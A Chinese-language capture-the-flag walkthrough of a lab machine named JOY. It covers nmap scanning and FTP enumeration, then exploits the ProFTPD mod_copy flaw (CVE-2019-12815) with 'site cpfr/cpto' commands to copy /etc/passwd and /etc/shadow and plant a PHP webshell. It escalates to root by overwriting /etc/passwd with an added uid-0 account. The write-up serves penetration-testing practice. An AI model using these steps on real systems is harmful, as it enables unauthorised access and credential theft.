端口
nmap主机发现
nmap -sn 192.168.72.0/24 Nmap scan report for 192.168.72.171 Host is up (0.00020s latency). 171是新出现的机器,他就是靶机
nmap端口扫描
nmap -Pn 192.168.72.171 -p- --min-rate 10000 -oA nmap/scan 扫描开放端口保存到 nmap/scan下 PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 25/tcp open smtp 80/tcp open http 110/tcp open pop3 139/tcp open netbios-ssn 143/tcp open imap 445/tcp open microsoft-ds 465/tcp open smtps 587/tcp open submission 993/tcp open imaps 995/tcp open pop3s 这么多端口:995,993,465,143,587,110,25都是邮箱服务 445,139是samba服务 80,22,21是常见的端口 以下我对渗透测试优先级排名: 21,80,22尝试枚举足够多的敏感信息加渗透,然后再查看这三个端口是否有服务漏洞 445,139枚举敏感信息,查看是否有可利用的漏洞 邮件服务端口:是否有敏感信息
立足
21端口
upload页面发现信息: directory文件: drwxr-xr-x 18 patrick patrick 4096 Sep 23 19:40 . drwxr-xr-x 4 root root 4096 Jan 6 2019 .. -rw------- 1 patrick patrick 185 Jan 28 2019 .bash_history -rw-r--r-- 1 patrick patrick 220 Dec 23 2018 .bash_logout -rw-r--r-- 1 patrick patrick 3526 Dec 23 2018 .bashrc drwx------ 7 patrick patrick 4096 Jan 10 2019 .cache drwx------ 10 patrick patrick 4096 Dec 26 2018 .config drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Desktop drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Documents drwxr-xr-x 3 patrick patrick 4096 Jan 6 2019 Downloads drwx------ 3 patrick patrick 4096 Dec 26 2018 .gnupg -rwxrwxrwx 1 patrick patrick 0 Jan 9 2019 haha -rw------- 1 patrick patrick 8532 Jan 28 2019 .ICEauthority drwxr-xr-x 3 patrick patrick 4096 Dec 26 2018 .local drwx------ 5 patrick patrick 4096 Dec 28 2018 .mozilla drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Music drwxr-xr-x 2 patrick patrick 4096 Jan 8 2019 .nano -rw-r--r-- 1 patrick patrick 0 Sep 23 19:40 PebAhabiNhV7N4eiwznehDQzCpydliND.txt drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Pictures -rw-r--r-- 1 patrick patrick 675 Dec 23 2018 .profile drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Public -rw-r--r-- 1 patrick patrick 24 Sep 23 19:40 qbcN77aaMZMzCNKOTlq9jBMrIRO5DshbvdJH1emkdC3ZFTAE7GPCBhZSnljTXHor.txt d--------- 2 root root 4096 Jan 9 2019 script drwx------ 2 patrick patrick 4096 Dec 26 2018 .ssh -rw-r--r-- 1 patrick patrick 0 Jan 6 2019 Sun drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Templates -rw-r--r-- 1 patrick patrick 0 Jan 6 2019 .txt -rw-r--r-- 1 patrick patrick 407 Jan 27 2019 version_control drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Videos 这是/home/patrick下的所有文件,其中确实有很多敏感内容 还有很多以project开头的文件,查看他们所有内容: cat project* This is a brave project! colour airline skilled footballer! Perhaps the head of development is secretly a sicko... either a dog name, or the name of a lottery in singapore ONE! wine app you only live once! dog cat ant bird fish hare snake mouse eagle rabbit jaguar python penguin peacock phoenix kangaroo parakeet mosquito mousedeer woodlouse cockroach kingfisher rhinoceros pondskater 一些名词,一般有三种推测:1.密码 2.用户名 3.没用 看后续场景是否能用到
80端口
是个开源的入侵检测系统,searchsploit 没发现0.8版本漏洞 交互的地方也比较少,看看url参数f是否有本地文件包含,最终结果当然没有,一般这种系统也不会出现这么低级错误 同时robots.txt页面什么敏感内容都没有
22端口
其报了三个错误,但都能使用参数解决 no matching key exchange method found. Their offer: diffie-hellman-group1-sha1 no matching host key type found. Their offer: ssh-rsa,ssh-dss no matching cipher found. Their offer: aes128-cbc,blowfish-cbc,twofish-cbc,3des-cbc ssh 192.168.72.171 -oKexAlgorithms=diffie-hellman-group1-sha1 -oHostKeyAlgorithms=ssh-rsa,ssh-dss -c aes128-cbc 但是又出现一个错误,明显是作者故意而为之: Connection reset by 192.168.72.171 port 22 22端口连接不了
21端口服务漏洞
按照我们的思路接下来查看21,80,22是否有服务漏洞 21端口ProFTPD 是1.2.10版本,我们着重挑选1.2.10的版本后的漏洞,我注意到了 1.3.5版本有个file copy的漏洞:看了poc得知,这了漏洞是未授权的敏感文件读写,那么影响力一定很大 果不其然我查到了这篇文章:https://gbhackers.com/proftpd-file-copy-vulnerability/ 文章标题:ProFTPD 的文件复制漏洞使超过 100 万台服务器面临风险 引用文章里的某些话: ProFTPD 服务器中的文件复制漏洞允许匿名远程攻击者在易受攻击的机器上执行代码,从而导致无需身份验证的远程代码执行和信息泄露。 利用此漏洞,攻击者可以运行具有 Pro-FTPd 服务权限的任何程序代码。此漏洞的编号为CVE-2019-12815,影响 1.3.5b 及以下所有版本。 那我们就能尝试一下此漏洞
nc 192.168.72.171 21 220 The Good Tech Inc. FTP Server site cpfr /etc/passwd 350 File or directory exists, ready for destination name site cpto /home/ftp/passwd 250 Copy successful site cpfr /etc/shadow 350 File or directory exists, ready for destination name site cpto /home/ftp/shadow 250 Copy successful 敏感文件先copy过来,但是ssh关闭的,我们只能尝试上传一个shell 为了上传webshell,我们直接把/var/www拷贝过来,目的是能够上传到正确的目录 220 The Good Tech Inc. FTP Server site cpfr /var/www 350 File or directory exists, ready for destination name site cpto /home/ftp/www 250 Copy successful 发现web主目录如下: /var/www/tryingharderisjoy/ossec 我们直接上传php的webshell 先将shell传给ftp put shell.php 然后拷贝shell.php到web目录 220 The Good Tech Inc. FTP Server site cpfr /home/ftp/shell.php 350 File or directory exists, ready for destination name site cpto /var/www/tryingharderisjoy/shell.php 250 Copy successful 点击即可getshell
提权
生成密码
openssl passwd -1 -salt hack hack123 生成一个hack123 md5加密的密码hash,然后盐值为hack再加密一次 构造字符串追加到passwd echo "hack:$1$hack$WTn0dk2QjNeKfl.DHOUue0:0:0:root:/root:/bin/bash" >> passwd
上传至ftp并覆盖/etc/passwd
put passwd nc 192.168.72.171 220 The Good Tech Inc. FTP Server site cpfr /home/ftp/upload/passwd 350 File or directory exists, ready for destination name site cpto /etc/passwd 250 Copy successful
覆盖后
su hack password:hack123 成为root root@JOY:~# id id uid=0(root) gid=0(root) groups=0(root)